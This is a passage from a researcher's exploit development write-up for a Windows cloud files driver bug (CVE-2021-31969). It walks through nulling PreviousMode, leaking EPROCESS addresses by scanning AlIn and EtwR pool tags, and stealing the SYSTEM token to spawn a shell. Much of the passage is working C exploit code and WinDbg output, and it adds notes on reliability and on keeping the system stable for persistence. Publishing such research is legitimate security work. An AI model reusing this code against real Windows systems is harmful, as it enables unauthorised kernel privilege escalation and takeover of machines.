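    size_t dst = dacl_write_offset(kthread, target, target);
    memcpy(kthread + dst, acl, sizeof acl);
}
```

With the target set to 0x229 and a null byte at 0x22a, the copy starts 8 bytes past the target, so Sbz1 lands on the assumed PreviousMode offset and the low byte of AclSize lands on BasePriority.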
This has a side effect of setting the BasePriority of the thread to 0x8 (THREAD_PRIORITY_BELOW_NORMAL), which isn’t too bad.
Armed with arbitrary read and the ability to null out PreviousMode once we locate it, the greatest hurdle has been overcome. All that’s required is to find the address of the exploit thread’s PreviousMode member.
Most escalation techniques, including this one, require us to locate an EPROCESS structure in kernel memory. Once we locate an arbitrary EPROCESS, we can go through its ActiveProcessLinks member to hunt for the exploit process as well as a system process.
On Windows versions before Windows 11 Build 25915, we can use the well known NtQuery* APIs to leak kernel addresses, including our own EPROCESS address.
Since this will no longer work soon and we already have a flexible arbitrary read primitive, I looked for other ways to leak an EPROCESS address.
There are many ways to leak EPROCESS, such as reading the PsInitialSystemProcess global variable or bruteforcing kernel address space.
I’ll show a shortcut to leaking an EPROCESS address from a known _TOKEN object.
While browsing through members of the _TOKEN object, which we can already leak from the WNF relative read, we can find a SessionObject member that points to a chunk that resides in the non-paged 0xB0 LFH bucket.
12: kd> !pool 0xffff9788`30cf3bd0
Pool page ffff978830cf3bd0 region is Nonpaged pool
ffff978830cf3000 size: 50 previous size: 0 (Free) ....
ffff978830cf3050 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf3100 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf31b0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3260 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3310 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf33c0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3470 size: b0 previous size: 0 (Allocated) WPLg
ffff978830cf3520 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf35d0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf3680 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf3730 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf37e0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3890 size: b0 previous size: 0 (Allocated) ITrk
ffff978830cf3940 size: b0 previous size: 0 (Allocated) ExTm
ffff978830cf39f0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3aa0 size: b0 previous size: 0 (Allocated) inte
*ffff978830cf3b50 size: b0 previous size: 0 (Allocated) *Sess
Owning component : Unknown (update pooltag.txt)
ffff978830cf3c00 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf3cb0 size: b0 previous size: 0 (Allocated) MmMl
ffff978830cf3d60 size: b0 previous size: 0 (Allocated) PFXM
ffff978830cf3e10 size: b0 previous size: 0 (Allocated) inte
ffff978830cf3ec0 size: b0 previous size: 0 (Allocated) inte
If we browse the pool allocations around it, we can find many AlIn tagged allocations.
12: kd> !pool 0xffff9788`30cf4000
Pool page ffff978830cf4000 region is Nonpaged pool
ffff978830cf4020 size: b0 previous size: 0 (Allocated) Sess
ffff978830cf40d0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf4180 size: b0 previous size: 0 (Allocated) WPLg
ffff978830cf4230 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf42e0 size: b0 previous size: 0 (Allocated) Filt
ffff978830cf4390 size: b0 previous size: 0 (Allocated) inte
ffff978830cf4440 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf44f0 size: b0 previous size: 0 (Allocated) Usfl
ffff978830cf45a0 size: b0 previous size: 0 (Allocated) inte
ffff978830cf4650 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4700 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf47b0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4860 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4910 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf49c0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4a70 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4b20 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4bd0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4c80 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4d30 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4de0 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4e90 size: b0 previous size: 0 (Allocated) AlIn
ffff978830cf4f40 size: b0 previous size: 0 (Allocated) AlIn
These allocations always seem to be located close to SessionObject, and are abundant.
I do not know what datatype this allocation is, so I used WinDbg to dump pointers within it.
12: kd> .foreach (addr {dps ffff978830cf4c80 La0}) {!object addr}
ffff8f8ed1576618: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
4: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978830cf4cf8: Not a valid object (ObjectType invalid)
Object: ffff978832c67380 Type: (ffff978830805e60) IoCompletion
ObjectHeader: ffff978832c67350 (new version)
HandleCount: 1 PointerCount: 32748
264ffe62090: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978832728420: Not a valid object (ObjectType invalid)
ffff978830cf4c90: Not a valid object (ObjectType invalid)
ffff978830cf4cc8: Not a valid object (ObjectType invalid)
Offset 0x38 of the allocation holds a pointer to an IoCompletion object, whose purpose here I again do not know. Viewing the pool layout around it shows that it is consistently surrounded by many EtwR objects.
7: kd> !pool ffffd685bcbeb7c0
Pool page ffffd685bcbeb7c0 region is Nonpaged pool
ffffd685bcbeb000 size: 50 previous size: 0 (Free) ....
ffffd685bcbeb050 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb130 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb210 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb2f0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb3d0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb4b0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb590 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb670 size: e0 previous size: 0 (Allocated) EtwR
*ffffd685bcbeb750 size: e0 previous size: 0 (Allocated) *IoCo
Pooltag IoCo : Io completion, Binary : nt!io
ffffd685bcbeb830 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb910 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbeb9f0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebad0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebbb0 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebc90 size: e0 previous size: 0 (Allocated) EtwR
ffffd685bcbebd70 size: e0 previous size: 0 (Allocated) IoCo
ffffd685bcbebe50 size: e0 previous size: 0 (Allocated) EtwR
This is a good sign, because if the EtwR object can leak interesting pointers, it will be a consistent technique without the need to spray.
I continued to dump pointers on the EtwR objects.
7: kd> .foreach (addr {dps ffffd685`bcbeb140 La0}) {!object addr}
ffffd685bcbeb140: Not a valid object (ObjectType invalid)
ffffd685bcbeb148: Not a valid object (ObjectType invalid)
48: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb150: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
ffffd685bcbeb158: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb160: Not a valid object (ObjectType invalid)
Object: ffffd685bcd59140 Type: (ffffd685b7ebd380) Process
ObjectHeader: ffffd685bcd59110 (new version)
HandleCount: 6 PointerCount: 196453
ffffd685bcbeb168: Not a valid object (ObjectType invalid)
1: not a valid object (ObjectHeader invalid @ -offset 30)
7: kd> dq ffffd685bcbeb140
ffffd685`bcbeb140 000000d8`00000000 00000000`00000048
ffffd685`bcbeb150 fffff801`2726ad00 00000000`00000000
ffffd685`bcbeb160 ffffd685`bcd59140 00000000`00000001 <- EPROCESS
ffffd685`bcbeb170 00000000`00008000 00000000`00000001
It turns out that every EtwR object holds an EPROCESS pointer at offset 0x20 (0x30 including chunk headers), giving us the info leak required.
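To summarize:
1. Read pool memory starting at the SessionObject pointer until we find the byte pattern AlIn
2. Read the IoCompletion object pointer stored at offset 0x38 of the AlIn allocation
3. Read pool memory starting at the IoCompletion object and search for the byte pattern EtwR to locate the EtwR object allocation
4. Read the EPROCESS pointer stored at offset 0x30 of the EtwR allocation
BOOL LocateEPROCESSAddresses(int WnfIndex, HANDLE RwToken, ULONG_PTR TokenSessionObject, ULONG_PTR *OwnEproc, ULONG_PTR *SystemEproc)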
{
BOOL status = FALSE;
PBYTE twoPageBuffer = NULL;
DWORD bufferSize = PAGE_SIZE * 2;
BYTE pageBuffer[PAGE_SIZE] = { 0 };
DWORD *cur = NULL;
ULONG_PTR allocationBase = NULL;
ULONG_PTR addrBuffer = NULL;
ULONG64 dataBuffer = 0;
PEPROCESS eproc = NULL;
twoPageBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
if (!twoPageBuffer) {
printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
goto out;
}
status = ArbitraryRead(WnfIndex, RwToken, TokenSessionObject, twoPageBuffer, bufferSize);
if (!status)
goto out;
cur = twoPageBuffer;
for (int i = 0; i < bufferSize / sizeof(DWORD); i++) {
if (cur[i] != 'nIlA')
continue;
// found tag, move back 0x4 bytes
allocationBase = TokenSessionObject + ((ULONG64)&(cur[i-1]) - (ULONG64)twoPageBuffer);
printf("[+] Found AlIn allocation at 0x%llx\n", allocationBase);
status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x38, &addrBuffer, 0x8);
if (!status || !addrBuffer)
goto out;
// found IoCompletion
printf("[+] Found IoCompletion object at 0x%llx\n", addrBuffer);
allocationBase = addrBuffer;
status = ArbitraryRead(WnfIndex, RwToken, allocationBase, &pageBuffer, PAGE_SIZE);
if (!status)
goto out;
// find EtwR tag
cur = pageBuffer;
for (int i = 0; i < PAGE_SIZE / sizeof(DWORD); i++) {
if (cur[i] != 'RwtE')
continue;
// found tag, move back 0x4 bytes
allocationBase += ((ULONG64)&(cur[i-1]) - (ULONG64)pageBuffer);
// extract EPROCESS
status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x30, &addrBuffer, 0x8);
if (!status || !addrBuffer)
goto out;
if (addrBuffer < 0xffff000000000000) {
puts("[-] Can't find EPROCESS");
goto out;
}
// found EPROCESS
printf("[+] Found EPROCESS object at 0x%llx\n", addrBuffer);
eproc = (PEPROCESS)addrBuffer;
do {
status = ArbitraryRead(WnfIndex, RwToken, &eproc->UniqueProcessId, &dataBuffer, 0x8);
if (!status)
goto out;
if (dataBuffer == GetCurrentProcessId()) {
*OwnEproc = eproc;
printf("[+] Found own EPROCESS address: 0x%llx\n", eproc);
}
else if (dataBuffer == 0x4) {
*SystemEproc = eproc;
printf("[+] Found system EPROCESS address: 0x%llx\n", eproc);
}
if (*OwnEproc && *SystemEproc) {
status = TRUE;
goto out;
}
status = ArbitraryRead(WnfIndex, RwToken, &eproc->ActiveProcessLinks, &dataBuffer, 0x8);
if (!status)
goto out;
eproc = CONTAINING_RECORD(dataBuffer, EPROCESS, ActiveProcessLinks);
} while (eproc != addrBuffer);
}
}
out:
if (twoPageBuffer)
HeapFree(GetProcessHeap(), 0, twoPageBuffer);
return status;
}
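Both searches in the function above rely on the same idea: find a 4-byte pool tag in leaked memory, then step back 4 bytes to reach the start of the pool header. The portable sketch below isolates that step. The function name is hypothetical, and it skips any match in the first 4 bytes so the step back cannot fall outside the buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the byte offset of the pool header (4 bytes before the tag)
 * for the first 4-byte-aligned match at or after `start`, or -1. */
long find_pool_header(const uint8_t *buf, size_t len, size_t start, const char tag[4])
{
    if (start < 4)
        start = 4; /* a header needs 4 bytes in front of the tag */
    start = (start + 3) & ~(size_t)3;
    for (size_t i = start; i + 4 <= len; i += 4)
        if (memcmp(buf + i, tag, 4) == 0)
            return (long)(i - 4);
    return -1;
}
```

Comparing raw bytes against "EtwR" is equivalent to comparing a little-endian DWORD against the multi-character constant 'RwtE' used in the exploit code.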
Afterwards it’s just a matter of overwriting PreviousMode, stealing the token, restoring PreviousMode and spawning a shell.
BOOL StealToken(PEPROCESS OwnEproc, PEPROCESS SystemEproc)
{
ULONG64 token = NULL;
if (!NtArbitraryRead(&SystemEproc->Token, &token, 0x8))
return FALSE;
if (!NtArbitraryWrite(&OwnEproc->Token, &token, 0x8))
return FALSE;
return TRUE;
}
Through empirical evidence I conclude that the exploit works about 1 in 15 tries on average. A large proportion of the failed attempts actually successfully overwrote WNF objects, but they also overwrote the adjacent TOKEN objects, rendering the WNF object unusable. A way to improve success rate on this version of Windows would be to overwrite WNF sizes with a larger value, such as 0x3000. That way we can query for more potentially untouched TOKEN objects. However I believe WNF only allows a maximum write of 0x1000 on later Windows versions.
The exploit will crash the system once it exits, so we have to keep the process running.
This is because the system will try to follow the linked list of _TERMINATION_PORT objects to free each of them, but we’ve corrupted the list at some point. A way to fix this would be to terminate the list at the first object by reading _ETHREAD->TerminationPort, but this results in our spray objects never being freed and thus a memory leak. However, we’ve also corrupted VS subsegment headers, WNF and TOKEN objects along the way, which may all cause a crash at some point.
Empirically as long as we keep the process running, the system will be stable long enough to perform basic persistence activities.
CVE-2023-36036, patched this November, stems from the same function, HsmpRpiDecompressBuffer, and is reported to be actively exploited in the wild. Unlike the CVE-2021-31969 patch, which restricts the minimum value cstmDataSize can take, this patch limits the maximum value of cstmDataSize to 0x4000, which is the maximum number of bytes HsmpRpReadBuffer would read. This suggests a possible OOB operation due to the previously uncapped size.
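Taken together, the two fixes bound the size field from both sides. The sketch below only expresses that combined constraint. It is not the patched driver code, and the names are hypothetical.

```c
#include <stdint.h>

#define CSTM_MIN_SIZE 4u      /* lower bound from the CVE-2021-31969 fix */
#define CSTM_MAX_SIZE 0x4000u /* upper bound described for CVE-2023-36036 */

/* Non-zero when the size field satisfies both bounds. */
int cstm_size_in_bounds(uint16_t size)
{
    return size >= CSTM_MIN_SIZE && size <= CSTM_MAX_SIZE;
}
```

Values of 3 and below would reintroduce the underflow discussed earlier, while values above 0x4000 describe more data than HsmpRpReadBuffer could have read.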
I would like to thank my mentor @linhlhq for patiently guiding and assisting me through the exploit development process. This work would not have been possible without his wisdom and experience.